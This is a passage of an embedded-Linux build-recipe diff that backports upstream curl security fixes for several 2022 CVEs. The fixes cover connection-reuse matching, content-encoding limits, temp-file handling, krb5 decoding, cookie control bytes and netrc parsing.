+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -2454,14 +2454,14 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
+ &data->set.proxy_ssl.certverifyresult : &data->set.ssl.certverifyresult;
+ const long int ssl_version = SSL_CONN_CONFIG(version);
+ #ifdef USE_TLS_SRP
+- const enum CURL_TLSAUTH ssl_authtype = SSL_SET_OPTION(authtype);
++ const enum CURL_TLSAUTH ssl_authtype = SSL_SET_OPTION(primary.authtype);
+ #endif
+ char * const ssl_cert = SSL_SET_OPTION(cert);
+ const char * const ssl_cert_type = SSL_SET_OPTION(cert_type);
+ const char * const ssl_cafile = SSL_CONN_CONFIG(CAfile);
+ const char * const ssl_capath = SSL_CONN_CONFIG(CApath);
+ const bool verifypeer = SSL_CONN_CONFIG(verifypeer);
+- const char * const ssl_crlfile = SSL_SET_OPTION(CRLfile);
++ const char * const ssl_crlfile = SSL_SET_OPTION(primary.CRLfile);
+ char error_buffer[256];
+
+ DEBUGASSERT(ssl_connect_1 == connssl->connecting_state);
+@@ -2741,15 +2741,15 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
+ #ifdef USE_TLS_SRP
+ if((ssl_authtype == CURL_TLSAUTH_SRP) &&
+ Curl_allow_auth_to_host(data)) {
+- char * const ssl_username = SSL_SET_OPTION(username);
+-
++ char * const ssl_username = SSL_SET_OPTION(primary.username);
++ char * const ssl_password = SSL_SET_OPTION(primary.password);
+ infof(data, "Using TLS-SRP username: %s\n", ssl_username);
+
+ if(!SSL_CTX_set_srp_username(BACKEND->ctx, ssl_username)) {
+ failf(data, "Unable to set SRP user name");
+ return CURLE_BAD_FUNCTION_ARGUMENT;
+ }
+- if(!SSL_CTX_set_srp_password(BACKEND->ctx, SSL_SET_OPTION(password))) {
++ if(!SSL_CTX_set_srp_password(BACKEND->ctx, ssl_password)) {
+ failf(data, "failed setting SRP password");
+ return CURLE_BAD_FUNCTION_ARGUMENT;
+ }
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index e38f74e..e8cb70f 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -89,6 +89,7 @@ Curl_ssl_config_matches(struct ssl_primary_config* data,
+ {
+ if((data->version == needle->version) &&
+ (data->version_max == needle->version_max) &&
++ (data->ssl_options == needle->ssl_options) &&
+ (data->verifypeer == needle->verifypeer) &&
+ (data->verifyhost == needle->verifyhost) &&
+ (data->verifystatus == needle->verifystatus) &&
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27782-2.patch b/meta/recipes-support/curl/curl/CVE-2022-27782-2.patch
new file mode 100644
index 0000000000..3d56025210
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27782-2.patch
@@ -0,0 +1,71 @@
+From 0a115a8903dffc7f723d1d4d71fb821d69eb8761 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 9 May 2022 23:13:53 +0200
+Subject: [PATCH] url: check SSH config match on connection reuse
+
+CVE-2022-27782
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2022-27782.html
+Closes #8825
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/1645e9b44505abd5cbaf65da5282c3f33b5924a5]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/url.c | 11 +++++++++++
+ lib/vssh/ssh.h | 6 +++---
+ 2 files changed, 14 insertions(+), 3 deletions(-)
+
+diff --git a/lib/url.c b/lib/url.c
+index 6518be9..8da0245 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -1027,6 +1027,12 @@ static void prune_dead_connections(struct Curl_easy *data)
+ }
+ }
+
++static bool ssh_config_matches(struct connectdata *one,
++ struct connectdata *two)
++{
++ return (Curl_safecmp(one->proto.sshc.rsa, two->proto.sshc.rsa) &&
++ Curl_safecmp(one->proto.sshc.rsa_pub, two->proto.sshc.rsa_pub));
++}
+ /*
+ * Given one filled in connection struct (named needle), this function should
+ * detect if there already is one that has all the significant details
+@@ -1260,6 +1266,11 @@ ConnectionExists(struct Curl_easy *data,
+ }
+ }
+
++ if(get_protocol_family(needle->handler->protocol) == PROTO_FAMILY_SSH) {
++ if(!ssh_config_matches(needle, check))
++ continue;
++ }
++
+ if(!needle->bits.httpproxy || (needle->handler->flags&PROTOPT_SSL) ||
+ needle->bits.tunnel_proxy) {
+ /* The requested connection does not use a HTTP proxy or it uses SSL or
+diff --git a/lib/vssh/ssh.h b/lib/vssh/ssh.h
+index 0d4ee52..8f2632e 100644
+--- a/lib/vssh/ssh.h
++++ b/lib/vssh/ssh.h
+@@ -7,7 +7,7 @@
+ * | (__| |_| | _ <| |___
+ * \___|\___/|_| \_\_____|
+ *
+- * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
++ * Copyright (C) 1998 - 2022, Daniel Stenberg, <daniel@haxx.se>, et al.
+ *
+ * This software is licensed as described in the file COPYING, which
+ * you should have received as part of this distribution. The terms
+@@ -120,8 +120,8 @@ struct ssh_conn {
+
+ /* common */
+ const char *passphrase; /* pass-phrase to use */
+- char *rsa_pub; /* path name */
+- char *rsa; /* path name */
++ char *rsa_pub; /* strdup'ed public key file */
++ char *rsa; /* strdup'ed private key file */
+ bool authed; /* the connection has been authenticated fine */
+ sshstate state; /* always use ssh.c:state() to change state! */
+ sshstate nextstate; /* the state to goto after stopping */
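The matcher added above only treats two SSH connections as interchangeable when both the private and public key paths agree, using the NULL-tolerant Curl_safecmp(). A self-contained sketch of that matching rule; the struct and helper names here are illustrative, not curl's own:

#include <stdbool.h>
#include <string.h>

/* NULL-tolerant comparison: two NULLs match, NULL vs non-NULL does not,
   otherwise fall back to byte-wise equality (same idea as Curl_safecmp). */
static bool safe_streq(const char *a, const char *b)
{
  if(a && b)
    return strcmp(a, b) == 0;
  return !a && !b;
}

/* Illustrative stand-in for the per-connection SSH key settings. */
struct ssh_keys {
  const char *rsa;      /* private key path, may be NULL */
  const char *rsa_pub;  /* public key path, may be NULL */
};

/* Reuse an SSH connection only when both key file paths match. */
static bool ssh_keys_match(const struct ssh_keys *one, const struct ssh_keys *two)
{
  return safe_streq(one->rsa, two->rsa) &&
         safe_streq(one->rsa_pub, two->rsa_pub);
}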
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32206.patch b/meta/recipes-support/curl/curl/CVE-2022-32206.patch
new file mode 100644
index 0000000000..3d76aeb43d
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32206.patch
@@ -0,0 +1,52 @@
+From 25e7be39be5f8ed696b6085ced9cf6c17e6128f4 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 16 May 2022 16:28:13 +0200
+Subject: [PATCH] content_encoding: return error on too many compression steps
+
+The max allowed steps is arbitrarily set to 5.
+
+Bug: https://curl.se/docs/CVE-2022-32206.html
+CVE-2022-32206
+Reported-by: Harry Sintonen
+Closes #9049
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/3a09fbb7f264c67c43]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/content_encoding.c | 9 +++++++++
+ 1 file changed, 9 insertions(+)
+
+diff --git a/lib/content_encoding.c b/lib/content_encoding.c
+index 6d47537..91e621f 100644
+--- a/lib/content_encoding.c
++++ b/lib/content_encoding.c
+@@ -934,6 +934,9 @@ static const content_encoding *find_encoding(const char *name, size_t len)
+ return NULL;
+ }
+
++/* allow no more than 5 "chained" compression steps */
++#define MAX_ENCODE_STACK 5
++
+ /* Set-up the unencoding stack from the Content-Encoding header value.
+ * See RFC 7231 section 3.1.2.2. */
+ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+@@ -941,6 +944,7 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+ {
+ struct Curl_easy *data = conn->data;
+ struct SingleRequest *k = &data->req;
++ int counter = 0;
+
+ do {
+ const char *name;
+@@ -975,6 +979,11 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+ if(!encoding)
+ encoding = &error_encoding; /* Defer error at stack use. */
+
++ if(++counter >= MAX_ENCODE_STACK) {
++ failf(data, "Reject response due to %u content encodings",
++ counter);
++ return CURLE_BAD_CONTENT_ENCODING;
++ }
+ /* Stack the unencoding stage. */
+ writer = new_unencoding_writer(conn, encoding, k->writer_stack);
+ if(!writer)
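The cap above is enforced while curl stacks its unencoding writers. A standalone sketch of the same idea, simplified to scan a single comma-separated Content-Encoding value rather than curl's writer stack; the names and the exact comparison are illustrative:

#include <stdio.h>
#include <string.h>

#define MAX_ENCODE_STACK 5   /* same arbitrary cap as in the patch */

/* Walk a comma-separated Content-Encoding value and refuse the response
   once too many codings are chained, instead of stacking decoders forever. */
static int check_encoding_chain(const char *value)
{
  int counter = 0;
  while(*value) {
    size_t len = strcspn(value, ",");
    if(len && ++counter > MAX_ENCODE_STACK) {
      fprintf(stderr, "reject: %d content encodings\n", counter);
      return -1;
    }
    value += len;
    if(*value == ',')
      value++;
  }
  return 0;
}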
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32207.patch b/meta/recipes-support/curl/curl/CVE-2022-32207.patch
new file mode 100644
index 0000000000..f75aaecd64
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32207.patch
@@ -0,0 +1,284 @@
+From af92181055d7d64dfc0bc9d5a13c8b98af3196be Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Wed, 25 May 2022 10:09:53 +0200
+Subject: [PATCH] fopen: add Curl_fopen() for better overwriting of files
+
+Bug: https://curl.se/docs/CVE-2022-32207.html
+CVE-2022-32207
+Reported-by: Harry Sintonen
+Closes #9050
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/20f9dd6bae50b]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ CMakeLists.txt | 1 +
+ configure.ac | 1 +
+ lib/Makefile.inc | 4 +-
+ lib/cookie.c | 19 ++-----
+ lib/curl_config.h.cmake | 3 ++
+ lib/fopen.c | 113 ++++++++++++++++++++++++++++++++++++++++
+ lib/fopen.h | 30 +++++++++++
+ 7 files changed, 155 insertions(+), 16 deletions(-)
+ create mode 100644 lib/fopen.c
+ create mode 100644 lib/fopen.h
+
+diff --git a/CMakeLists.txt b/CMakeLists.txt
+index 73b053b..cc587b0 100644
+--- a/CMakeLists.txt
++++ b/CMakeLists.txt
+@@ -869,6 +869,7 @@ elseif(HAVE_LIBSOCKET)
+ set(CMAKE_REQUIRED_LIBRARIES socket)
+ endif()
+
++check_symbol_exists(fchmod "${CURL_INCLUDES}" HAVE_FCHMOD)
+ check_symbol_exists(basename "${CURL_INCLUDES}" HAVE_BASENAME)
+ check_symbol_exists(socket "${CURL_INCLUDES}" HAVE_SOCKET)
+ check_symbol_exists(select "${CURL_INCLUDES}" HAVE_SELECT)
+diff --git a/configure.ac b/configure.ac
+index d090622..7071077 100755
+--- a/configure.ac
++++ b/configure.ac
+@@ -4059,6 +4059,7 @@ AC_CHECK_DECLS([getpwuid_r], [], [AC_DEFINE(HAVE_DECL_GETPWUID_R_MISSING, 1, "Se
+
+
+ AC_CHECK_FUNCS([fnmatch \
++ fchmod \
+ geteuid \
+ getpass_r \
+ getppid \
+diff --git a/lib/Makefile.inc b/lib/Makefile.inc
+index 46ded90..79307d8 100644
+--- a/lib/Makefile.inc
++++ b/lib/Makefile.inc
+@@ -63,7 +63,7 @@ LIB_CFILES = file.c timeval.c base64.c hostip.c progress.c formdata.c \
+ curl_multibyte.c hostcheck.c conncache.c dotdot.c \
+ x509asn1.c http2.c smb.c curl_endian.c curl_des.c system_win32.c \
+ mime.c sha256.c setopt.c curl_path.c curl_ctype.c curl_range.c psl.c \
+- doh.c urlapi.c curl_get_line.c altsvc.c socketpair.c rename.c
++ doh.c urlapi.c curl_get_line.c altsvc.c socketpair.c rename.c fopen.c
+
+ LIB_HFILES = arpa_telnet.h netrc.h file.h timeval.h hostip.h progress.h \
+ formdata.h cookie.h http.h sendf.h ftp.h url.h dict.h if2ip.h \
+@@ -84,7 +84,7 @@ LIB_HFILES = arpa_telnet.h netrc.h file.h timeval.h hostip.h progress.h \
+ x509asn1.h http2.h sigpipe.h smb.h curl_endian.h curl_des.h \
+ curl_printf.h system_win32.h rand.h mime.h curl_sha256.h setopt.h \
+ curl_path.h curl_ctype.h curl_range.h psl.h doh.h urlapi-int.h \
+- curl_get_line.h altsvc.h quic.h socketpair.h rename.h
++ curl_get_line.h altsvc.h quic.h socketpair.h rename.h fopen.h
+
+ LIB_RCFILES = libcurl.rc
+
+diff --git a/lib/cookie.c b/lib/cookie.c
+index 68054e1..a9ad20a 100644
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -97,8 +97,8 @@ Example set of cookies:
+ #include "curl_memrchr.h"
+ #include "inet_pton.h"
+ #include "parsedate.h"
+-#include "rand.h"
+ #include "rename.h"
++#include "fopen.h"
+
+ /* The last 3 #include files should be in this order */
+ #include "curl_printf.h"
+@@ -1524,18 +1524,9 @@ static int cookie_output(struct Curl_easy *data,
+ use_stdout = TRUE;
+ }
+ else {
+- unsigned char randsuffix[9];
+-
+- if(Curl_rand_hex(data, randsuffix, sizeof(randsuffix)))
+- return 2;
+-
+- tempstore = aprintf("%s.%s.tmp", filename, randsuffix);
+- if(!tempstore)
+- return 1;
+-
+- out = fopen(tempstore, FOPEN_WRITETEXT);
+- if(!out)
+- goto error;
++ error = Curl_fopen(data, filename, &out, &tempstore);
++ if(error)
++ goto error;
+ }
+
+ fputs("# Netscape HTTP Cookie File\n"
+@@ -1581,7 +1572,7 @@ static int cookie_output(struct Curl_easy *data,
+ if(!use_stdout) {
+ fclose(out);
+ out = NULL;
+- if(Curl_rename(tempstore, filename)) {
++ if(tempstore && Curl_rename(tempstore, filename)) {
+ unlink(tempstore);
+ goto error;
+ }
+diff --git a/lib/curl_config.h.cmake b/lib/curl_config.h.cmake
+index 98cdf51..fe43751 100644
+--- a/lib/curl_config.h.cmake
++++ b/lib/curl_config.h.cmake
+@@ -124,6 +124,9 @@
+ /* Define to 1 if you have the <assert.h> header file. */
+ #cmakedefine HAVE_ASSERT_H 1
+
++/* Define to 1 if you have the `fchmod' function. */
++#cmakedefine HAVE_FCHMOD 1
++
+ /* Define to 1 if you have the `basename' function. */
+ #cmakedefine HAVE_BASENAME 1
+
+diff --git a/lib/fopen.c b/lib/fopen.c
+new file mode 100644
+index 0000000..ad3691b
+--- /dev/null
++++ b/lib/fopen.c
+@@ -0,0 +1,113 @@
++/***************************************************************************
++ * _ _ ____ _
++ * Project ___| | | | _ \| |
++ * / __| | | | |_) | |
++ * | (__| |_| | _ <| |___
++ * \___|\___/|_| \_\_____|
++ *
++ * Copyright (C) 1998 - 2022, Daniel Stenberg, <daniel@haxx.se>, et al.
++ *
++ * This software is licensed as described in the file COPYING, which
++ * you should have received as part of this distribution. The terms
++ * are also available at https://curl.se/docs/copyright.html.
++ *
++ * You may opt to use, copy, modify, merge, publish, distribute and/or sell
++ * copies of the Software, and permit persons to whom the Software is
++ * furnished to do so, under the terms of the COPYING file.
++ *
++ * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
++ * KIND, either express or implied.
++ *
++ * SPDX-License-Identifier: curl
++ *
++ ***************************************************************************/
++
++#include "curl_setup.h"
++
++#if !defined(CURL_DISABLE_COOKIES) || !defined(CURL_DISABLE_ALTSVC) || \
++ !defined(CURL_DISABLE_HSTS)
++
++#ifdef HAVE_FCNTL_H
++#include <fcntl.h>
++#endif
++
++#include "urldata.h"
++#include "rand.h"
++#include "fopen.h"
++/* The last 3 #include files should be in this order */
++#include "curl_printf.h"
++#include "curl_memory.h"
++#include "memdebug.h"
++
++/*
++ * Curl_fopen() opens a file for writing with a temp name, to be renamed
++ * to the final name when completed. If there is an existing file using this
++ * name at the time of the open, this function will clone the mode from that
++ * file. if 'tempname' is non-NULL, it needs a rename after the file is
++ * written.
++ */
++CURLcode Curl_fopen(struct Curl_easy *data, const char *filename,
++ FILE **fh, char **tempname)
++{
++ CURLcode result = CURLE_WRITE_ERROR;
++ unsigned char randsuffix[9];
++ char *tempstore = NULL;
++ struct_stat sb;
++ int fd = -1;
++ *tempname = NULL;
++
++ if(stat(filename, &sb) == -1 || !S_ISREG(sb.st_mode)) {
++ /* a non-regular file, fallback to direct fopen() */
++ *fh = fopen(filename, FOPEN_WRITETEXT);
++ if(*fh)
++ return CURLE_OK;
++ goto fail;
++ }
++
++ result = Curl_rand_hex(data, randsuffix, sizeof(randsuffix));
++ if(result)
++ goto fail;
++
++ tempstore = aprintf("%s.%s.tmp", filename, randsuffix);
++ if(!tempstore) {
++ result = CURLE_OUT_OF_MEMORY;
++ goto fail;
++ }
++
++ result = CURLE_WRITE_ERROR;
++ fd = open(tempstore, O_WRONLY | O_CREAT | O_EXCL, 0600);
++ if(fd == -1)
++ goto fail;
++
++#ifdef HAVE_FCHMOD
++ {
++ struct_stat nsb;
++ if((fstat(fd, &nsb) != -1) &&
++ (nsb.st_uid == sb.st_uid) && (nsb.st_gid == sb.st_gid)) {
++ /* if the user and group are the same, clone the original mode */
++ if(fchmod(fd, sb.st_mode) == -1)
++ goto fail;
++ }
++ }
++#endif
++
++ *fh = fdopen(fd, FOPEN_WRITETEXT);
++ if(!*fh)
++ goto fail;
++
++ *tempname = tempstore;
++ return CURLE_OK;
++
++fail:
++ if(fd != -1) {
++ close(fd);
++ unlink(tempstore);
++ }
++
++ free(tempstore);
++
++ *tempname = NULL;
++ return result;
++}
++
++#endif /* ! disabled */
+diff --git a/lib/fopen.h b/lib/fopen.h
+new file mode 100644
+index 0000000..289e55f
+--- /dev/null
++++ b/lib/fopen.h
+@@ -0,0 +1,30 @@
++#ifndef HEADER_CURL_FOPEN_H
++#define HEADER_CURL_FOPEN_H
++/***************************************************************************
++ * _ _ ____ _
++ * Project ___| | | | _ \| |
++ * / __| | | | |_) | |
++ * | (__| |_| | _ <| |___
++ * \___|\___/|_| \_\_____|
++ *
++ * Copyright (C) 1998 - 2022, Daniel Stenberg, <daniel@haxx.se>, et al.
++ *
++ * This software is licensed as described in the file COPYING, which
++ * you should have received as part of this distribution. The terms
++ * are also available at https://curl.se/docs/copyright.html.
++ *
++ * You may opt to use, copy, modify, merge, publish, distribute and/or sell
++ * copies of the Software, and permit persons to whom the Software is
++ * furnished to do so, under the terms of the COPYING file.
++ *
++ * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
++ * KIND, either express or implied.
++ *
++ * SPDX-License-Identifier: curl
++ *
++ ***************************************************************************/
++
++CURLcode Curl_fopen(struct Curl_easy *data, const char *filename,
++ FILE **fh, char **tempname);
++
++#endif
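Curl_fopen() above writes through a random-suffixed temp file (opened with O_EXCL and, when fchmod() is available and ownership matches, given the original file's mode) and returns the temp name so the caller can rename it over the target only after writing succeeded, as the cookie.c hunk now does. A simplified POSIX sketch of that caller-side write-then-rename protocol, not curl's actual API:

#include <stdio.h>
#include <unistd.h>

/* Write 'payload' to "<target>.tmp" and only rename() it over 'target'
   when both the write and the close succeeded; otherwise discard it. */
static int save_atomically(const char *target, const char *payload)
{
  char tmpname[4096];
  FILE *out;
  int ok;

  snprintf(tmpname, sizeof(tmpname), "%s.tmp", target);
  out = fopen(tmpname, "w");      /* Curl_fopen() adds O_EXCL and mode cloning */
  if(!out)
    return -1;

  ok = (fputs(payload, out) >= 0);
  ok = (fclose(out) == 0) && ok;  /* close exactly once, keep the error */

  if(ok && rename(tmpname, target) == 0)
    return 0;

  unlink(tmpname);                /* drop the partial temp file on failure */
  return -1;
}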
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32208.patch b/meta/recipes-support/curl/curl/CVE-2022-32208.patch
new file mode 100644
index 0000000000..2939314d09
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32208.patch
@@ -0,0 +1,72 @@
+From 3b90f0b2a7a84645acce151c86b40d25b5de6615 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 9 Jun 2022 09:27:24 +0200
+Subject: [PATCH] krb5: return error properly on decode errors
+
+Bug: https://curl.se/docs/CVE-2022-32208.html
+CVE-2022-32208
+Reported-by: Harry Sintonen
+Closes #9051
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/6ecdf5136b52af7]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/krb5.c | 5 +----
+ lib/security.c | 13 ++++++++++---
+ 2 files changed, 11 insertions(+), 7 deletions(-)
+
+diff --git a/lib/krb5.c b/lib/krb5.c
+index f50287a..5b77e35 100644
+--- a/lib/krb5.c
++++ b/lib/krb5.c
+@@ -86,11 +86,8 @@ krb5_decode(void *app_data, void *buf, int len,
+ enc.value = buf;
+ enc.length = len;
+ maj = gss_unwrap(&min, *context, &enc, &dec, NULL, NULL);
+- if(maj != GSS_S_COMPLETE) {
+- if(len >= 4)
+- strcpy(buf, "599 ");
++ if(maj != GSS_S_COMPLETE)
+ return -1;
+- }
+
+ memcpy(buf, dec.value, dec.length);
+ len = curlx_uztosi(dec.length);
+diff --git a/lib/security.c b/lib/security.c
+index fbfa707..3542210 100644
+--- a/lib/security.c
++++ b/lib/security.c
+@@ -192,6 +192,7 @@ static CURLcode read_data(struct connectdata *conn,
+ {
+ int len;
+ CURLcode result;
++ int nread;
+
+ result = socket_read(fd, &len, sizeof(len));
+ if(result)
+@@ -200,7 +201,10 @@ static CURLcode read_data(struct connectdata *conn,
+ if(len) {
+ /* only realloc if there was a length */
+ len = ntohl(len);
+- buf->data = Curl_saferealloc(buf->data, len);
++ if(len > CURL_MAX_INPUT_LENGTH)
++ len = 0;
++ else
++ buf->data = Curl_saferealloc(buf->data, len);
+ }
+ if(!len || !buf->data)
+ return CURLE_OUT_OF_MEMORY;
+@@ -208,8 +212,11 @@ static CURLcode read_data(struct connectdata *conn,
+ result = socket_read(fd, buf->data, len);
+ if(result)
+ return result;
+- buf->size = conn->mech->decode(conn->app_data, buf->data, len,
+- conn->data_prot, conn);
++ nread = buf->size = conn->mech->decode(conn->app_data, buf->data, len,
++ conn->data_prot, conn);
++ if(nread < 0)
++ return CURLE_RECV_ERROR;
++ buf->size = (size_t)nread;
+ buf->index = 0;
+ return CURLE_OK;
+ }
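The security.c change above bounds a peer-supplied length before reallocating and refuses to store a negative decode result as an unsigned buffer size. A minimal sketch of that pattern; the cap value and function shape are illustrative, not curl's API:

#include <stdlib.h>

#define MAX_INPUT 1048576   /* illustrative cap standing in for CURL_MAX_INPUT_LENGTH */

/* Grow the buffer to a peer-supplied length only after sanity-checking it,
   and turn a negative decode result into a hard error. */
static int read_block(unsigned char **buf, size_t *bufsize, long len,
                      int (*decode)(unsigned char *p, long n))
{
  unsigned char *p;
  int nread;

  if(len <= 0 || len > MAX_INPUT)
    return -1;                    /* bogus length from the peer */
  p = realloc(*buf, (size_t)len);
  if(!p)
    return -1;
  *buf = p;
  /* ... read 'len' raw bytes into *buf here ... */
  nread = decode(*buf, len);
  if(nread < 0)
    return -1;                    /* decode failed: report, don't truncate */
  *bufsize = (size_t)nread;
  return 0;
}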
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32221.patch b/meta/recipes-support/curl/curl/CVE-2022-32221.patch
new file mode 100644
index 0000000000..8e662abd3a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32221.patch
@@ -0,0 +1,29 @@
+From 75c04a3e75e8e3025a17ca3033ca307da9691cd0 Mon Sep 17 00:00:00 2001
+From: Vivek Kumbhar <vkumbhar@mvista.com>
+Date: Fri, 11 Nov 2022 10:49:58 +0530
+Subject: [PATCH] CVE-2022-32221
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/a64e3e59938abd7d6]
+CVE: CVE-2022-32221
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+
+setopt: when POST is set, reset the 'upload' field.
+---
+ lib/setopt.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/lib/setopt.c b/lib/setopt.c
+index bebb2e4..4d96f6b 100644
+--- a/lib/setopt.c
++++ b/lib/setopt.c
+@@ -486,6 +486,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+ }
+ else
+ data->set.httpreq = HTTPREQ_GET;
++ data->set.upload = FALSE;
+ break;
+
+ case CURLOPT_COPYPOSTFIELDS:
+--
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2022-35252.patch b/meta/recipes-support/curl/curl/CVE-2022-35252.patch
new file mode 100644
index 0000000000..a5160c01f4
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-35252.patch
@@ -0,0 +1,72 @@
+From c9212bdb21f0cc90a1a60dfdbb716deefe78fd40 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 29 Aug 2022 00:09:17 +0200
+Subject: [PATCH] cookie: reject cookies with "control bytes"
+
+Rejects 0x01 - 0x1f (except 0x09) plus 0x7f
+
+Reported-by: Axel Chong
+
+Bug: https://curl.se/docs/CVE-2022-35252.html
+
+CVE-2022-35252
+
+Closes #9381
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/8dfc93e573ca740544a2d79ebb]
+
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/cookie.c | 29 +++++++++++++++++++++++++++++
+ 1 file changed, 29 insertions(+)
+
+diff --git a/lib/cookie.c b/lib/cookie.c
+index a9ad20a..66c7715 100644
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -412,6 +412,30 @@ static bool bad_domain(const char *domain)
+ return !strchr(domain, '.') && !strcasecompare(domain, "localhost");
+ }
+
++/*
++ RFC 6265 section 4.1.1 says a server should accept this range:
++
++ cookie-octet = %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E
++
++ But Firefox and Chrome as of June 2022 accept space, comma and double-quotes
++ fine. The prime reason for filtering out control bytes is that some HTTP
++ servers return 400 for requests that contain such.
++*/
++static int invalid_octets(const char *p)
++{
++ /* Reject all bytes \x01 - \x1f (*except* \x09, TAB) + \x7f */
++ static const char badoctets[] = {
++ "\x01\x02\x03\x04\x05\x06\x07\x08\x0a"
++ "\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14"
++ "\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x7f"
++ };
++ size_t vlen, len;
++ /* scan for all the octets that are *not* in cookie-octet */
++ len = strcspn(p, badoctets);
++ vlen = strlen(p);
++ return (len != vlen);
++}
++
+ /****************************************************************************
+ *
+ * Curl_cookie_add()
+@@ -558,6 +582,11 @@ Curl_cookie_add(struct Curl_easy *data,
+ badcookie = TRUE;
+ break;
+ }
++ if(invalid_octets(whatptr) || invalid_octets(name)) {
++ infof(data, "invalid octets in name/value, cookie dropped");
++ badcookie = TRUE;
++ break;
++ }
+ }
+ else if(!len) {
+ /* this was a "<name>=" with no content, and we must allow
+--
+2.35.1
+
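invalid_octets() above rejects cookie names and values that contain control bytes via strcspn(). The same check as a runnable standalone program, assuming nothing beyond the C standard library:

#include <stdio.h>
#include <string.h>

/* Reject a cookie name/value containing any control byte 0x01-0x1f
   (except TAB, 0x09) or 0x7f. */
static int has_bad_octets(const char *p)
{
  static const char badoctets[] =
    "\x01\x02\x03\x04\x05\x06\x07\x08\x0a"
    "\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14"
    "\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x7f";
  return strcspn(p, badoctets) != strlen(p);
}

int main(void)
{
  printf("%d\n", has_bad_octets("ok-value"));       /* prints 0 */
  printf("%d\n", has_bad_octets("bad\x01value"));   /* prints 1 */
  return 0;
}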
diff --git a/meta/recipes-support/curl/curl/CVE-2022-35260.patch b/meta/recipes-support/curl/curl/CVE-2022-35260.patch
new file mode 100644
index 0000000000..476c996b0a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-35260.patch
@@ -0,0 +1,68 @@
+From 3ff3989ec53d9ddcf4bdd99f5d5788dd87486768 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 4 Oct 2022 14:37:24 +0200
+Subject: [PATCH] netrc: replace fgets with Curl_get_line
+
+Upstream-Status: Backport
+CVE: CVE-2022-35260
+Reference to upstream patch: https://github.com/curl/curl/commit/c97ec984fb2bc919a3aa863e0476dffa377b184c
+
+Make the parser only accept complete lines and avoid problems with
+overly long lines.
+
+Reported-by: Hiroki Kurosawa
+
+Closes #9789
+---
+ lib/curl_get_line.c | 4 ++--
+ lib/netrc.c | 5 +++--
+ 2 files changed, 5 insertions(+), 4 deletions(-)
+
+diff --git a/lib/curl_get_line.c b/lib/curl_get_line.c
+index c4194851ae09..4b9eea9e631c 100644
+--- a/lib/curl_get_line.c
++++ b/lib/curl_get_line.c
+@@ -28,8 +28,8 @@
+ #include "memdebug.h"
+
+ /*
+- * get_line() makes sure to only return complete whole lines that fit in 'len'
+- * bytes and end with a newline.
++ * Curl_get_line() makes sure to only return complete whole lines that fit in
++ * 'len' bytes and end with a newline.
+ */
+ char *Curl_get_line(char *buf, int len, FILE *input)
+ {
+diff --git a/lib/netrc.c b/lib/netrc.c
+index 1c9da31993c9..93239132c9d8 100644
+--- a/lib/netrc.c
++++ b/lib/netrc.c
+@@ -31,6 +31,7 @@
+ #include "netrc.h"
+ #include "strtok.h"
+ #include "strcase.h"
++#include "curl_get_line.h"
+
+ /* The last 3 #include files should be in this order */
+ #include "curl_printf.h"
